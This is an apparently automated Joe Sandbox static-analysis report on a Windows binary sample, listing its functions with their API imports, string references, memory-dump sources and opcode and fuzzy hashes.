CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 006E741A
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 006E7446
CloseHandle.KERNEL32(?), ref: 006E7457
GetLastError.KERNEL32 ref: 006E7467
RemoveDirectoryW.KERNEL32(?), ref: 006E74B3
DeleteFileW.KERNEL32(?), ref: 006E74DB

Strings

\??\, xrefs: 006E7217
UNC\, xrefs: 006E723C
SeCreateSymbolicLinkPrivilege, xrefs: 006E71BC
SeRestorePrivilege, xrefs: 006E71B2

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: fd5787d87041ec3f1296a7095bba48647e8f61b14e716f02bb7ed5acebe085a1
Instruction ID: 153a10390cdadb3b23caacf1ec96daac36a72f8ceafd7e0a87419d0abc164460
Opcode Fuzzy Hash: fd5787d87041ec3f1296a7095bba48647e8f61b14e716f02bb7ed5acebe085a1
Instruction Fuzzy Hash: 90B1F471905355EBDF20DF64CC45BEE7BBAAF04300F004569F949E7282D738AA49CB65

Function 006E3281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E328A
_memcmp.LIBVCRUNTIME ref: 006E3377

Strings

hc%u, xrefs: 006E367B
CMT, xrefs: 006E3990
h%u, xrefs: 006E362D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: 9c548ef78d025ab445f855868108d6e445ef7dad9a3f563fd927ba6ccd629de4
Instruction ID: a7dfe48b8cc16fd717ab82a7d64b765bfe7fc4640ec2d98423d6e6c17bb78a73
Opcode Fuzzy Hash: 9c548ef78d025ab445f855868108d6e445ef7dad9a3f563fd927ba6ccd629de4
Instruction Fuzzy Hash: 6432B1715113C49FDF54DF25C899AEA37A6AF14300F04047EFD8A8B382EB70AA49CB64

Function 0070D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0070D154

Strings

1#INF, xrefs: 0070E361
1#SNAN, xrefs: 0070E353
1#IND, xrefs: 0070E34C
1#QNAN, xrefs: 0070E35A

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: fbab3a677fdf16a534eebdcd2ad96880e1a4deafa6b6986ff609f8705155982c
Instruction ID: aaf7768024725e3afad647b704a73ec6e9363aa84fe7e54ff5da527a1c1dfce3
Opcode Fuzzy Hash: fbab3a677fdf16a534eebdcd2ad96880e1a4deafa6b6986ff609f8705155982c
Instruction Fuzzy Hash: 68C22871E08628CBDB35CE689D407EAB7F5EB44314F1546EAD84DE7280E779AE818F40

Function 006E27E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E27F1
_strlen.LIBCMT ref: 006E2D7F

Part of subcall function 006F137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,006EB652,00000000,?,?,?,0001042E), ref: 006F1396

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006E2EE0

Strings

CMT, xrefs: 006E2F13

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: 0870d7759f0166a67ba6608f6a0aeecf293d602bd763a749a5237ed88b6d47e7
Instruction ID: fe75870af86d20b618fdf5e71d295ee9db7b8425da024c5326001c165132ecf5
Opcode Fuzzy Hash: 0870d7759f0166a67ba6608f6a0aeecf293d602bd763a749a5237ed88b6d47e7
Instruction Fuzzy Hash: BC62E0715013C58FDF18DF2AC8956EA3BE7AF54304F08457DED9A8B382DA70A949CB60

Function 0070866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00708767
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00708771
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0070877E

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c699ab93356de1fced43e0e29cde855002815d60d4bc829fcf32eb3583c6ddc4
Instruction ID: 497e97591a68ef738526281ba706ecf80717c7c7d1164060391d765f039bc86c
Opcode Fuzzy Hash: c699ab93356de1fced43e0e29cde855002815d60d4bc829fcf32eb3583c6ddc4
Instruction Fuzzy Hash: 4231B77590122DABCB61DF68D8897DCB7B4BF08310F5081EAE91CA7291EB349B858F45

Function 0070AAA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0070AC3B

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: c0fdb04f2cbe7093d5c34491856a120a5d05f2fe8295a0eb4566ae8786607433
Instruction ID: 97f699c0355a24398a0955b538edbd744aee78dad996e739e72d6626655fe4d3
Opcode Fuzzy Hash: c0fdb04f2cbe7093d5c34491856a120a5d05f2fe8295a0eb4566ae8786607433
Instruction Fuzzy Hash: F031C3B1900209FBDB249E79CC84EEB7BFEDB85314F144298E519972D1D6389D44CB61

Function 0070CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction ID: 4cf9593f69817b314589d2d0e3d6a3d0c4f3c1adb6bf69c1417d3e533610633e
Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction Fuzzy Hash: 17022D72E00219DBDF15CFA9C9806ADBBF2EF48314F254369E919E7384D735A941CB90

Function 006FA63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 006FA662
GetNumberFormatW.KERNEL32(00000400,00000000,?,0071E600,?,?), ref: 006FA6B1

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 4dee66eb1e6c5fa05470703deb2316d92677bbe7f8520d288855dbbb908df17b
Instruction ID: 12923b324ee81ad758aafdbeb62853e095b77443f427149e310867a1509db764
Opcode Fuzzy Hash: 4dee66eb1e6c5fa05470703deb2316d92677bbe7f8520d288855dbbb908df17b
Instruction Fuzzy Hash: 59015E76600248BBEB108FA8DC05FEB77BCEF59711F409822BA0897190D3749A1487A9

Function 006E6EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(006F117C,?,00000200), ref: 006E6EC9
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 006E6EEA

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: b712eaa000fc1a299ade7b7ba1fc4fc2ae4bd94c729a1591aba024c4d926718d
Instruction ID: ceed0324cf6e84a5d65e5be686c0166c9214d6f6b45b3dd2b86e6af1c303e2ca
Opcode Fuzzy Hash: b712eaa000fc1a299ade7b7ba1fc4fc2ae4bd94c729a1591aba024c4d926718d
Instruction Fuzzy Hash: AFD0C9353C8302BFEA110A79DC06FAB7FA6A769BD2F20C514B356ED0E0CA7091159629

Function 00711194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0071118F,?,?,00000008,?,?,00710E2F,00000000), ref: 007113C1

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 81415a279f50acf9ffb98b9f57e99fe520a727a54b38303dbca27116cf6d6aba
Instruction ID: bf804303a3ba3a931e48d00890d5586728da2c9950d01f0ca649c3c72c42c7e3
Opcode Fuzzy Hash: 81415a279f50acf9ffb98b9f57e99fe520a727a54b38303dbca27116cf6d6aba
Instruction Fuzzy Hash: 05B13B716106099FD715CF2CC48ABA57BE0FF45364FA58658EAA9CF2E1C339E981CB40

Function 006E407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

gj, xrefs: 006E40C1

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 9231a2a8f6060a7ccd5b443bd43edb4592fcf630cb962d419cbe2bc7c8864912
Instruction ID: ccc2b8702868f0881bb47470a7bd0761029af1634a9887b983a48a9745f3ebd2
Opcode Fuzzy Hash: 9231a2a8f6060a7ccd5b443bd43edb4592fcf630cb962d419cbe2bc7c8864912
Instruction Fuzzy Hash: 22F1E2B1A083418FC348CF2DD880A5AFBE1BFCC208F15896EF498D7751E634E9458B56

Function 006EACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 006EAD1A

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 220b0efee624f73e905d5a180b6e48c87075e71d544dbe18b03b44e07ff7b66e
Instruction ID: eaa2b69c34baec15a8ebfdf6c779b069de615c7a2ac0e844880fa0ffe94e693a
Opcode Fuzzy Hash: 220b0efee624f73e905d5a180b6e48c87075e71d544dbe18b03b44e07ff7b66e
Instruction Fuzzy Hash: DBF01DB490130C8BCB38CB58ED416E977B6FB58711F208299D92543794D378BD418EA5

Function 006FF063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,006FEAC5), ref: 006FF068

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bca7a5f7ebbc74507489ef84100f7b4f223545d9a44c34fa1ec1ff8cc1f5df8f
Instruction ID: b8c8cf5f00ff5415aa546aa3b3c1def78ae6a0ea0f69146d3b2d910d45adbacb
Opcode Fuzzy Hash: bca7a5f7ebbc74507489ef84100f7b4f223545d9a44c34fa1ec1ff8cc1f5df8f
Instruction Fuzzy Hash:

Function 0070B710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0070B710

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: ebfcf970867660c469836be647dfe15fb3073b4ea77b4d8d8880b1f7d838d218
Instruction ID: c33484fac583d078a92d1093484dc05dc2ebc55895bee12ca1159cea159774b3
Opcode Fuzzy Hash: ebfcf970867660c469836be647dfe15fb3073b4ea77b4d8d8880b1f7d838d218
Instruction Fuzzy Hash: 3CA02474100300CFC300CF355D0C30C35DD75011C1305C1155004C1070DF3CC0505F05

Function 006F5C77 Relevance: .8, Instructions: 800COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
Instruction ID: f905a5c5eca76c1988cbbc9754b61c631af1a6478ee6a9427b9ddaf2470aae2f
Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
Instruction Fuzzy Hash: B7621731604B8D9FCB25CF38C9916F9BBE2AF55304F04856DEAAB8B346D630E945CB14

Function 006F70BF Relevance: .8, Instructions: 773COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
Instruction ID: dbcc98a60a311f1b6b7ddb6ea025de26a1ece8857f9519381918451a44a249d8
Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
Instruction Fuzzy Hash: E762157160878E9FC719CF28C8805B9FBE2BF55304F14866DDAA687742D730EA56CB84

Function 006EED14 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
Instruction ID: 6e7b22fb8298f8ae52c3c48a6b3cd290bbf2dc57c349dd2320d7d8a278eb2fb0
Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
Instruction Fuzzy Hash: A15229B26087058FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA19CB86

Function 006F6A7B Relevance: .5, Instructions: 509COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 987f06f3c3bc13f17d52f230f73246ac679b787d55851bc3e29d060c84562c78
Instruction ID: f88c1ba611cb064c89bb2b300848b6def68217ce54890a85bf5db77104aee6a5
Opcode Fuzzy Hash: 987f06f3c3bc13f17d52f230f73246ac679b787d55851bc3e29d060c84562c78
Instruction Fuzzy Hash: 0D12D3B170470A8BC728CF28D9D06B9B7E2FF54308F14892DE697C7A81D774A8A5CB45

Function 006EBE13 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
